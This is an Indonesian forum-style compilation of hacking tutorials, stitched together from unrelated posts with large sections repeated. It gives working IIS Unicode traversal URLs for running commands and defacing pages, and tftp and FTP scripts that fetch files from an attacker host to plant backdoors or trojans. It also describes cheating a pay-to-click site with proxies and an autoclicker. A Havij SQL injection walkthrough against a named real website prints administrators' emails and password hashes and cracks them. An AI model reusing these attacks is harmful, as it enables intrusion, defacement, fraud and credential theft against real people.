"+>+c:inepubwwwrootindex.htm
/c+echo"
This Web Site Hacking BY ....:::J.A.N.G.K.|.K:...
Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda
"+>+c:inepubwwwrootjangkrik.htm
keterangan :
%3d adalah pernyataan tanda =
%22 adalah Pernyataan tanda "
%23 adalah pernyataan tanda #
Untuk Anda Yang Paham Html Anda Bisa NGapain aja Tuh Deface Web Anda. Biar Bagus hack deface nya di input pakai Flash juga
g.) Langkah terkahir untuk liat hasilnya Membaca file yang lain dengan menggunakan perintah 'type' :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+type+c%3Ainetpubwwwrootindex.htm
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+type+c%3Ainetpubwwwrootjangkrik.htm
Atau liat Langsung aja http://www.target.com/ atau http://www.target.com/jangkrik.htm
Jika dikau menemukan webserver ini dalam penulisannya accses denied ( penolakan penulisan ) Maka langkah kedua yaitu dengan cara tftp:
B.) Deface WebSite Dengan Cara tftp
Deface nya dilakukan dengan meng-upload file lewat TFTP32
Untuk Mendukung Tftp kita download dulu softwarenya http://www.download.com/ ketik keyword nya TFTP32
Dikau Main Di Kompi diserver (sebab di user pasti takkan bisa).
Meng-upload file lewat TFTP32.. koe tdk perlu mengcopy cmd.exe nyah langsung sajah.
mari kita mulai meng-uploadnyah perintahnya sesuai langkah berikut ini :
a.) Kita Lakukan Langkah a.) (A.)pada deface dengan echo untuk mencari vulnernnya atau bug cginya
sehingga kita mendapatkan holenya atau script nya http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/
langkah selanjutnya yaitu uploadnya lagi. Namun Sebelumnya kita Dah siapkan File htm/html halaman web defacenya ( berkreasi lah dikau disini )
Setelah semua siap baru upload dengan command http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe up-load)+ C:InetPubwwwrootmain.html
b.)Kita liat lagi apa yg terjadi di IE kita.
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :
Waa..waaa .selamat dikau telah berhasil meng-upload file dikau memakai sofwer TFTP32 tadee silahkan buka web site target tadi
Kekurangannyah dalam meng-upload file lewat TFTP32 terkadang suatu server (web site) tidak mau menerima up-load file kita tadee. Jikalau itu terjadi maka gunakanlah cara pertama di atas tadee.
C.) Dengan Cara Ftp Dengan Web Kita Yang Telah Kita Isi Dengan Bahan Deface Kita
Langkah Pertama adalah kita bikin dulu domain gratisan di web server gratisan. di web itu kita drop halaman web deface kita atau backdoor,virus atau program penghancur lainnya
selanjutnya kita lakukan Sama dengan Cara langkah a.)(A.) setelah dikau tau hole cgi bugnya atau unicodennya maka dikau lakukan langkah berikut ini:
a.) Setelah kita menemukan vulnernya
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:
Directory of c:
10/05/2001 19:56
Programs Files
10/05/2001 19:56
Inetpub
08/05/2001 10:23 230 cmd.exe
24/04/2001 04:33 4.620 1home.htm
05/10/2000 12:40 668 about.htm
10/05/2001 19:54
AboutUs
11/05/2001 10:28 131 about_us.htm
28/10/2000 14:49 4.911 about_us.old.htm
b.) Lalu kita lakukan langkah copy sesuai di langkah b.)(A.) ---->>tujuan nya memendekkan command unicode nya
c.) Lalu Kita Liat +set nya untuk melihat patch translade nya
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+set
Kira Nya path nya di c:inetpubwwwroot
d.)Langkah Selanjutnya Yaitu kita membuat script ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+open+geocities.com+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+jangkrik+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+anuamakang+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+lcd+c:inetpubwwwroot+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+ascii+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+get+jangkrik.htm+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+close+>>+c:inetpubwwwrootjangkrik.ftp
Setelah Scrip jangkrik.ftp selesai di liat lagi script nya apa benar
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+type+c:inetpubwwwrootjangkrik.ftp
Setelah selesai script tuh kita jalan kan lagi script nya:
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+ftp+-s:c:inetpubwwwrootjangkrik.ftp
buka ie satulagi untuk liat file nya dah smapai belum
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:inetpubwwwroot
Kalau dah terkirim selamat dah
Keterangan nya :
Pada scrip jangkrik.ftp itu kita muatkan hal ini sebenarnya
open geocities.com --->>> scriptnya --->> +echo+open+geocities.com+>>+c:inetpubwwwrootjangkrik.ftp
jangkrik --->> user name --->>> scriptnya -->> +echo+jangkrik+>>+c:inetpubwwwrootjangkrik.ftp
anuamakang --->>> password --->>> scriptnya -->> +echo+anuamakang+>>+c:inetpubwwwrootjangkrik.ftp
lcd c:inetpubwwwroot --->>> folder tujuan --->>> scriptnya -->>>+echo+lcd+c:inetpubwwwroot+>>+c:inetpubwwwrootjangkrik.ftp
ascii --->>> bentuk file --->>> scripnya --->>> +echo+ascii+>>+c:inetpubwwwrootjangkrik.ftp
get jangkrik.htm ---->>> command tranfer file --->>> +echo+get+jangkrik.htm+>>+c:inetpubwwwrootjangkrik.ftp
close --->> perintah dc ke web server ---->>> scripnya --->>> +echo+close+>>+c:inetpubwwwrootjangkrik.ftp
hehehe Dengan cara ini anda dapat drop apa saja keweb orang tuh baik itu web deface, backdror, ircserver, bot, bnc, psybnc, trojan and virus deh..........
untuk mengirim file yang binary kode bentuk file dari asci di ubah menjadi binary
seng duwur aku copas neng forum sebelah soalnya aku orak pinter nulis dowo karo kie tak kei seko gaweaan ku dewe dudu2 copas
sekedar share tool buat pemalas nie.. yg malas pake cara manual silahkan cobain yg ini,
tool ini sama kegunaanya kek punyanya om riluke (wekkzzz sok kenal wkwkwk)
cmn kalo buatannya om riluke kedetect sebagai trojan di kaspersky kalo ini ga ada sama skali n udah gwa buktiin ndiri
masalah kinerja ga jauh bedah lah.. sama buatannya riluke (itu sih pendapat gwa.. heheh)
Download source Code
http://www.4shared.com/file/183402357/f15ee059/m4x.html
kalo ada kesalahan mohon di perbaiki soalnya saya cuma newbie yang masih punya kekurangan ...
1. Kita Harus menentukan WebSite Target/ Sasaran Kita : http://www.target.loe contoh-->> http://www.target.com
2. Login
Ini Merupakan Directory yang Ada Di Web Site Tersebut
Directory Ini Di Configurasi Dengan Script tertentu Supayafile dalam Web tersebut Berhubungan Jika terjadi bug pada script nya maka kita bisa bembus web ini
ada beberapa contoh login diantaranya :
a)/_vti_bin
b)/_vti_cnf
c)/cgi-bin
d)/scripts
e)/msadc
3. Unicode --->> merupakan code yang dapat membaca script configurasi website tersebut code ini yang dapat membaca bug cgi nya
hasil codingnya seperti bisa 1-3 x pengulangan tergantung target yang akan kita hackinng
a) ..%c1%1c..
b) ..%c0%9v..
c) ..%c0%af..
d) ..%c0%qf..
e) ..%c1%8s..
f) ..%e0%80%af..
g) ..%c1%9c..
h) ..%c1%pc..
4. OS target -->>ini Menyatakan Sertificate Web Os kita WinNT dan Win98
0xB5 ISO 8859-1
0xC5 ISO 8859-1
0xEA CP437
0x2140 JIS X 0208
0x22 ISO 8859-1
5. Cara Kerja
Secara Garis Besar deface Ini dilakukan Dengan tiga Cara yaitu :
A.) Deface WebSite Perintah Echo
a.)Secara umum : http://target/login/unicode/os/system/c+dir atau http://www.target.com/login/unicode/os/system/c+dir
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?%2Fc+dir+c:
Jika terdapat Bug Maka Pada title brower kita ada kata CGi Error Maka Kita telah menembus web site itu
Maka Yang terlihat pada brower kita adalah list yang berupa isi hardisk webserver tersebut sama halnya
command dir yang kita lakukan di Dos Prompt
Directory of c:
10/05/2001 19:56 Programs Files
10/05/2001 19:56 Inetpub
08/05/2001 10:23 230 cmd.exe
24/04/2001 04:33 4.620 1home.htm
05/10/2000 12:40 668 about.htm
10/05/2001 19:54 AboutUs
11/05/2001 10:28 131 about_us.htm
28/10/2000 14:49 4.911 about_us.old.htm
b.)Setelah berhasil liat List Hardisk Kita Harus cari Path_Translade web nya dengan menggunakan command /c+dir+c: di ubah menjadi /c+set
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?%2Fc+dir+c: menjadi http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?%2Fc+set /c+dir+c: di ubah menjadi /c+set
maka Akan keluar CGI error yang isinya menyatakan Configurasi Batch Sytem WebServer tersebut. Keluar Macam - Macam, Yang Perlu dilihat cuma:
Path_Translated=d:\inetpub\wwwroot
c.) Langkah Selanjutnya Adalah Copy file cmd.exe dengan nama baru cmd1.exe atau nama anda contoh Jangkrik.exe dengan mengganti
/c+dir+c: menjadi /c+copy+c:
lalu ditambahkan dengan : winntsystem32cmd.exe+c:jangkrik.exe
sehingga kita dapatkan :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?%2Fc+copy+c%3Awinntsystem32cmd.exe+c%3Ajangkrik.exe
sekarang kamu bisa liat file cmd1.exe udah ada di direktori :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+dir+c:
Tujuan Ini Sebenarnya untuk menyingkat command pada addres ie kita
d.) Cari halaman index ke http://www.target.com/blah.ida
Kadang-kadang ekstensi .ida yang tidak diketahui akan merespon lokal path.
Kalo trik .ida tidak bekerja, coba gunakan direktori InetPub :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+dir+c%3Ainetpub
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+dir+c%3Ainetpubwwwroot
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+dir+c%3Ainetpubwwwrootindex.htm
sebenarnya langkah ini tidak perlu tapi untuk jaga -jaga kan ngak papa
dengan langkah b.) tadi sebenarnya kita sudah tau dimana letah index.htm nya atau dengan kata lain folder webnya
e.) kalau lo merasa dirinya hacker backup dulu halaman depan web nya, karena hacker kerjanya bukan menghancurkan tapi memperingatkan
hanya orang - orang amatiran atau katalain orang yang berjiwa vandalis yang kerja merusak tanpa backup index.htm nya, jika tidak kita menulisnya dengan nama file baru dengan cara :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+copy+c%3Ainetpubwwwrootindex.htm+c%3Ainetpubwwwrooti ndex.htm.bak
f.) Baru Kita deface atau echo Halaman Depannya dengan command dibawah ini :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+echo+You+Were+Hacked+>+c:inetpubwwwrootindex.htm
untuk tidak merusak web nya kita tulis dengan nama file baru
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+echo+You+Were+Hacked+>+c:inetpubwwwrootjangkrik.htm
/c+echo+You%20Were%20Hacked+>+c: >>> adalah untuk menuliskan kata-kata You Were Hacked pada
c:inetpubwwwrootindex.htm file yang ditulis atau c:inetpubwwwrootjangkrik.htm file yang ditulis
Untuk Anda yang telah Paham Bahasa Html Kalau pengen Hasil Defacenya keren Gunakan command ini
/c+echo"
This Web Site Hacking BY ....:::J.A.N.G.K.|.K:...
Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda
"+>+c:inepubwwwrootindex.htm
/c+echo"
This Web Site Hacking BY ....:::J.A.N.G.K.|.K:...
Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda
"+>+c:inepubwwwrootjangkrik.htm
keterangan :
%3d adalah pernyataan tanda =
%22 adalah Pernyataan tanda "
%23 adalah pernyataan tanda #
Untuk Anda Yang Paham Html Anda Bisa NGapain aja Tuh Deface Web Anda. Biar Bagus hack deface nya di input pakai Flash juga
g.) Langkah terkahir untuk liat hasilnya Membaca file yang lain dengan menggunakan perintah 'type' :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+type+c%3Ainetpubwwwrootindex.htm
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?%2Fc+type+c%3Ainetpubwwwrootjangkrik.htm
Atau liat Langsung aja http://www.target.com/ atau http://www.target.com/jangkrik.htm
Jika dikau menemukan webserver ini dalam penulisannya accses denied ( penolakan penulisan ) Maka langkah kedua yaitu dengan cara tftp:
B.) Deface WebSite Dengan Cara tftp
Deface nya dilakukan dengan meng-upload file lewat TFTP32
Untuk Mendukung Tftp kita download dulu softwarenya http://www.download.com/ ketik keyword nya TFTP32
Dikau Main Di Kompi diserver (sebab di user pasti takkan bisa).
Meng-upload file lewat TFTP32.. koe tdk perlu mengcopy cmd.exe nyah langsung sajah.
mari kita mulai meng-uploadnyah perintahnya sesuai langkah berikut ini :
a.) Kita Lakukan Langkah a.) (A.)pada deface dengan echo untuk mencari vulnernnya atau bug cginya
sehingga kita mendapatkan holenya atau script nya http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/
langkah selanjutnya yaitu uploadnya lagi. Namun Sebelumnya kita Dah siapkan File htm/html halaman web defacenya ( berkreasi lah dikau disini )
Setelah semua siap baru upload dengan command http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe up-load)+ C:InetPubwwwrootmain.html
b.)Kita liat lagi apa yg terjadi di IE kita.
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :
Waa..waaa .selamat dikau telah berhasil meng-upload file dikau memakai sofwer TFTP32 tadee silahkan buka web site target tadi
Kekurangannyah dalam meng-upload file lewat TFTP32 terkadang suatu server (web site) tidak mau menerima up-load file kita tadee. Jikalau itu terjadi maka gunakanlah cara pertama di atas tadee.
C.) Dengan Cara Ftp Dengan Web Kita Yang Telah Kita Isi Dengan Bahan Deface Kita
Langkah Pertama adalah kita bikin dulu domain gratisan di web server gratisan. di web itu kita drop halaman web deface kita atau backdoor,virus atau program penghancur lainnya
selanjutnya kita lakukan Sama dengan Cara langkah a.)(A.) setelah dikau tau hole cgi bugnya atau unicodennya maka dikau lakukan langkah berikut ini:
a.) Setelah kita menemukan vulnernya
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:
Directory of c:
10/05/2001 19:56
Programs Files
10/05/2001 19:56
Inetpub
08/05/2001 10:23 230 cmd.exe
24/04/2001 04:33 4.620 1home.htm
05/10/2000 12:40 668 about.htm
10/05/2001 19:54
AboutUs
11/05/2001 10:28 131 about_us.htm
28/10/2000 14:49 4.911 about_us.old.htm
b.) Lalu kita lakukan langkah copy sesuai di langkah b.)(A.) ---->>tujuan nya memendekkan command unicode nya
c.) Lalu Kita Liat +set nya untuk melihat patch translade nya
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+set
Kira Nya path nya di c:inetpubwwwroot
d.)Langkah Selanjutnya Yaitu kita membuat script ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+open+geocities.com+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+jangkrik+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+anuamakang+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+lcd+c:inetpubwwwroot+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+ascii+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+get+jangkrik.htm+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+close+>>+c:inetpubwwwrootjangkrik.ftp
Setelah Scrip jangkrik.ftp selesai di liat lagi script nya apa benar
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+type+c:inetpubwwwrootjangkrik.ftp
Setelah selesai script tuh kita jalan kan lagi script nya:
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+ftp+-s:c:inetpubwwwrootjangkrik.ftp
buka ie satulagi untuk liat file nya dah smapai belum
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:inetpubwwwroot
Kalau dah terkirim selamat dah
Keterangan nya :
Pada scrip jangkrik.ftp itu kita muatkan hal ini sebenarnya
open geocities.com --->>> scriptnya --->> +echo+open+geocities.com+>>+c:inetpubwwwrootjangkrik.ftp
jangkrik --->> user name --->>> scriptnya -->> +echo+jangkrik+>>+c:inetpubwwwrootjangkrik.ftp
anuamakang --->>> password --->>> scriptnya -->> +echo+anuamakang+>>+c:inetpubwwwrootjangkrik.ftp
lcd c:inetpubwwwroot --->>> folder tujuan --->>> scriptnya -->>>+echo+lcd+c:inetpubwwwroot+>>+c:inetpubwwwrootjangkrik.ftp
ascii --->>> bentuk file --->>> scripnya --->>> +echo+ascii+>>+c:inetpubwwwrootjangkrik.ftp
get jangkrik.htm ---->>> command tranfer file --->>> +echo+get+jangkrik.htm+>>+c:inetpubwwwrootjangkrik.ftp
close --->> perintah dc ke web server ---->>> scripnya --->>> +echo+close+>>+c:inetpubwwwrootjangkrik.ftp
hehehe Dengan cara ini anda dapat drop apa saja keweb orang tuh baik itu web deface, backdror, ircserver, bot, bnc, psybnc, trojan and virus deh..........
untuk mengirim file yang binary kode bentuk file dari asci di ubah menjadi binary
seng duwur aku copas neng forum sebelah soalnya aku orak pinter nulis dowo karo kie tak kei seko gaweaan ku dewe dudu2 copas
sekedar share tool buat pemalas nie.. yg malas pake cara manual silahkan cobain yg ini,
tool ini sama kegunaanya kek punyanya om riluke (wekkzzz sok kenal wkwkwk)
cmn kalo buatannya om riluke kedetect sebagai trojan di kaspersky kalo ini ga ada sama skali n udah gwa buktiin ndiri
masalah kinerja ga jauh bedah lah.. sama buatannya riluke (itu sih pendapat gwa.. heheh)
Download source Code
http://www.4shared.com/file/183402357/f15ee059/m4x.html
kalo ada kesalahan mohon di perbaiki soalnya saya cuma newbie yang masih punya kekurangan ...
Cara Curang Dapet Dolar
Oke Semua nya.....!!!
Gue mau share cara /terlicik ngedapetin dolar..
ikutin step by step nya ya....
Banyak yang bertanya apa benar sih jika kita upgrade account Clixsense ke premium, maka iklan yang tampil akan jadi banyak. Jawabannya sih untuk orang Indonesia sebenarnya BELUM TENTU. Lho kok bisa? Tentu saja karena sistemnya Clixsense adalah geo-targeting, artinya advertiser dapat memilih di negara mana saja iklannya ditampilkan dan kebanyakan mereka mentargetkan di Amerika. Jadi untuk yang tinggal di Asia mungkin kan jarang kebagian iklan Clixsense, apalagi untuk Indonesia yang memang dipandang sebelah mata. Jangan harap begitu anda upgrade maka iklannya akan bertambah setiap harinya. Memang sih, tapi hanya pas pertama saja, setelah itu iklannya langsung bubar jalan, hahahaha….makannya saya sering banget dimarahi oleh orang-orang yang dulu pernah upgrade menggunakan jasa saya, hehehe. Begitulah resiko berbuat baik :)
Lalu tujuan saya posting ini untuk apa? Sama sekali bukan untuk menakut-nakuti, tidak menganjurkan, bahkan melarang anda untuk upgrade. Yang tadi hanyalah sedikit curhat dari saya yang sering kena marah karena tidak pernah bilang soal ini. Tapi sekarang saya sudah menemukan rahasianya, yaitu rahasia supaya iklan yang tampil terus banyak. Pake proxy? Hampir benar, tapi kebanyakan pada salah cara untuk menggunakannya. Memang benar jika menggunakan proxy bisa memperbanyak iklan Clixsense yang muncul, tapi ada langkah awal yang terlewatkan. Anda harus dianggap tinggal di Amerika saat pertama kali registrasi Clixsense, artinya anda harus menggunakan proxy saat mendaftar Clixsense. Jika tidak, ya dianggap tinggal di luar dunia, hehehe, just kidding.
jangan kuatir kagak dibayar situs nih masuk dalam elite site di
http://ptc-investigation.com/clixsense.aspx
1. ) pertama2 cari proxy nya dlo gan.... di sini http://www.xroxy.com
goole aja bnyak yang menyediakan proxy
2.) daftar pilih negara amrik coy daftar nya disin
http://www.clixsense.com/?3411482
3.) bgian Interests centang semua biar iklnya banyak...klu udah liat iklanya klu di Browse Advertisements
klu berhasil iklnya 5-10 iklan standart...klu gagal cuman 1....(beginilah nasib indonesia hihihi)
4.) nah abis tuh buat yang buat udah punya modal langsung aja invest cuma 10$$ gan
bagi yang kere /gak punya modal ....klick aja tiap hari..kumpulin 10$$
baru upgrade ke premium klu upgrade 500 iklan
5 dolar sehari dari klik2 doank ...
oh ya klu mau clik iklan harus make proxy amerika juga biar iklanya bnyak
nah berhubung ada autocliker, make auto cliker aja gan,
jadi gakperlu clik2 lagi..tugas agan cuma refresh2 browser
jangka waktu 5 menit BahagiaBahagia
scriptnya udah gua update jadi timing nya tepat..
cara pake:
instal greasy monkey dolo...cari dimari
https://addons.mozilla.org/id/firefox/ad...asemonkey/
trus instal scriptnya:
http://userscripts.org/scripts/show/98442
klu udah tinggal buka pengaturan mozzila
pada alat/pengaturan/isi,
unchek "blokir jendela pop-up"
lalu oke...
klu udah langsung ke "Browse Advertisements"
biarkan bot jalan sendri hihihihi
perhitunganya gini gan
10 ads = 5 menit..
60 menit : 5 menit= 12 x 10 ads = 120
12 x 10 ads = 120
120 x 0,01 = 1,2 $$ perjam wew PiktorPiktor
Bahagia.........\m/
sekian tutor nya gan jangan lupa daftar di mari
http://www.clixsense.com/?3411482
Gue mau share cara /terlicik ngedapetin dolar..
ikutin step by step nya ya....
Banyak yang bertanya apa benar sih jika kita upgrade account Clixsense ke premium, maka iklan yang tampil akan jadi banyak. Jawabannya sih untuk orang Indonesia sebenarnya BELUM TENTU. Lho kok bisa? Tentu saja karena sistemnya Clixsense adalah geo-targeting, artinya advertiser dapat memilih di negara mana saja iklannya ditampilkan dan kebanyakan mereka mentargetkan di Amerika. Jadi untuk yang tinggal di Asia mungkin kan jarang kebagian iklan Clixsense, apalagi untuk Indonesia yang memang dipandang sebelah mata. Jangan harap begitu anda upgrade maka iklannya akan bertambah setiap harinya. Memang sih, tapi hanya pas pertama saja, setelah itu iklannya langsung bubar jalan, hahahaha….makannya saya sering banget dimarahi oleh orang-orang yang dulu pernah upgrade menggunakan jasa saya, hehehe. Begitulah resiko berbuat baik :)
Lalu tujuan saya posting ini untuk apa? Sama sekali bukan untuk menakut-nakuti, tidak menganjurkan, bahkan melarang anda untuk upgrade. Yang tadi hanyalah sedikit curhat dari saya yang sering kena marah karena tidak pernah bilang soal ini. Tapi sekarang saya sudah menemukan rahasianya, yaitu rahasia supaya iklan yang tampil terus banyak. Pake proxy? Hampir benar, tapi kebanyakan pada salah cara untuk menggunakannya. Memang benar jika menggunakan proxy bisa memperbanyak iklan Clixsense yang muncul, tapi ada langkah awal yang terlewatkan. Anda harus dianggap tinggal di Amerika saat pertama kali registrasi Clixsense, artinya anda harus menggunakan proxy saat mendaftar Clixsense. Jika tidak, ya dianggap tinggal di luar dunia, hehehe, just kidding.
jangan kuatir kagak dibayar situs nih masuk dalam elite site di
http://ptc-investigation.com/clixsense.aspx
1. ) pertama2 cari proxy nya dlo gan.... di sini http://www.xroxy.com
goole aja bnyak yang menyediakan proxy
2.) daftar pilih negara amrik coy daftar nya disin
http://www.clixsense.com/?3411482
3.) bgian Interests centang semua biar iklnya banyak...klu udah liat iklanya klu di Browse Advertisements
klu berhasil iklnya 5-10 iklan standart...klu gagal cuman 1....(beginilah nasib indonesia hihihi)
4.) nah abis tuh buat yang buat udah punya modal langsung aja invest cuma 10$$ gan
bagi yang kere /gak punya modal ....klick aja tiap hari..kumpulin 10$$
baru upgrade ke premium klu upgrade 500 iklan
5 dolar sehari dari klik2 doank ...
oh ya klu mau clik iklan harus make proxy amerika juga biar iklanya bnyak
nah berhubung ada autocliker, make auto cliker aja gan,
jadi gakperlu clik2 lagi..tugas agan cuma refresh2 browser
jangka waktu 5 menit BahagiaBahagia
scriptnya udah gua update jadi timing nya tepat..
cara pake:
instal greasy monkey dolo...cari dimari
https://addons.mozilla.org/id/firefox/ad...asemonkey/
trus instal scriptnya:
http://userscripts.org/scripts/show/98442
klu udah tinggal buka pengaturan mozzila
pada alat/pengaturan/isi,
unchek "blokir jendela pop-up"
lalu oke...
klu udah langsung ke "Browse Advertisements"
biarkan bot jalan sendri hihihihi
perhitunganya gini gan
10 ads = 5 menit..
60 menit : 5 menit= 12 x 10 ads = 120
12 x 10 ads = 120
120 x 0,01 = 1,2 $$ perjam wew PiktorPiktor
Bahagia.........\m/
sekian tutor nya gan jangan lupa daftar di mari
http://www.clixsense.com/?3411482
HAVIJ
HAVIJ
Havij, sebuah tool yang powerfull untuk mendapatkan akses admin dengan teknik sql injection. download tool ini dibawah (Hey r3dm0v3.. u coded an awesome tool)
Download Havij:http://www.ziddu.com/download/10136078/Havij1.10.rar.html [/font] SQL Injection Tool
Ok saya asumsikan anda sudah download dan install di mesin anda. sekarang mari kita coba salah satu website milik Israel.. (hmmm…. kenapa salah satu website di negara anda dijadikan kelinci disini sangat berkaitan erat dengan agresi militer anda pada kapal relawan dunia untuk Palestina.. saya non muslim tapi arogansi Israel adalah buntut dari tutorial ini).
web target : http://www.xenia.co.il/index.php?page_id=93
seperti biasanya berikan tanda ‘ pada web tsb:
http://www.xenia.co.il/index.php?page_id=̢۪93
hasilnya dapat anda lihat pada gambar dibawah. BUG SQL Injection
Sekarang jalankan tool Havij lalu masukkan link tersebut lalu klik Analize dan tunggu beberapa saat (yang ini ga sampe 1 menit)….
hasilnya:
Havij 1.10 ready!
Analyzing http://www.xenia.co.il/index.php?page_id=̢۪93
Host IP: 212.150.130.231
Web Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
Powered-by: PHP/5.2.12
Keyword Found: mysql_num_rows():
I guess injection type is Integer?!
DB Server: MySQL
Selected Column Count is 2
Valid String Column is 1
Target Vulnerable :D
Current DB: xeniaco_xenia
w007s…… I Got the database… sekarang klik Tables lalu klik Get Tables
w007s….. I gOt the Tables from xeniaco_xenia database..
users_match
users_fav
params_parents
params_pages
params_icons
params
page_managers
page_banned
page_allowed
nuke_users
newsletter1
main_access
lpn_users_areas_maps
lpn_users_areas
ip_blocker
gallery_auth_users
form_datas
enter_rules
cat_tbl
bep_users_target
bep_users_cats
bep_pics
bep_other
bep_news
bep_links
bep_html_data
bep_files
bep_data
bep_banners
bep_addons
banners
admins
admin_titles
WhoIsOnLineTbl
WhoIsOnLineMessagesTbl
Table1
Nah .. pada tahap ini, anda perlu cari tahu… dimana letak table yang berisi informasi admin login. setelah ditelusuri ternyata terdapat pada tabel nuke_users. sekarang coba kita lihat isi kolom daripada tabel nuke_users.
Beri tanda centang pada nuke_users lalu klik Get Columns dan tunggu beberapa saat (hmmm… 10 detik aja).
w007ss…. cool.. got to check it out… saya dapatkan kolom sbb
regdate
status
regkey
user_msg_to_mail
mail_check_interval
mail_pass
mail_login
mail_port
mail_server
user_level
user_rank
user_attachsig
user_posts
user_char
newsletter
counter
commentmax
theme
ublock
ublockon
bio
noscore
thold
uorder
umode
storynum
apass
pass
user_cell
user_homephone
user_theme
user_viewemail
user_sig
user_homepage
user_from
user_sign
user_dob
user_regdate
user_avatar
l_name
femail
email
uname
name uid
newsletter1
nah.. ini adalah kolom dari tabel nuke_users yang berisi informasi registrasi, nama, password, email, nomor hp dari Admin website http://www.xenia.co.il.. sekarang saya akan mencoba mendapatkan akses selanjutnya ke website ini.. hmmmm…. saya ceklis aja kolom :
name
email
pass
(kolom lain ga penting.. cuma pengen dapat username dan passwordnya aja).
lalu klik Get Data dan
Hasilnya sebagai berikut :
Count(*) of xeniaco_xenia.nuke_users is 3
Data Found: name=à åãé
Data Found: email=udi@tmuna.co.il
Data Found: pass=b440097c79ba6183170f5f118b47a31d
Data Found: name=guy
Data Found: email=guy@xenia.co.il
Data Found: pass=f4384abb3921b5cf321a5a24960c4aef
Data Found: name=inbar
Data Found: email=inbar@xenia.co.il
Data Found: pass=b3f61131b6eceeb2b14835fa648a48ff
w007s…. ternyata website ini memiliki 3 administrator…
hmmmm… passwordnya di HASH alias di-enkripsi….. no problem… havij juga punya md5 hash crack..
Klik MD5 masukkan data salah satu data HASH lalu klik start (tunggu beberapa saat…. 30 detik deh). lalu hasilnya
w0000000000000000000000000000007ZZZZZZZZZZZZZZZZ… password berhasil di-crack.. sekarang tinggal cari halaman login.
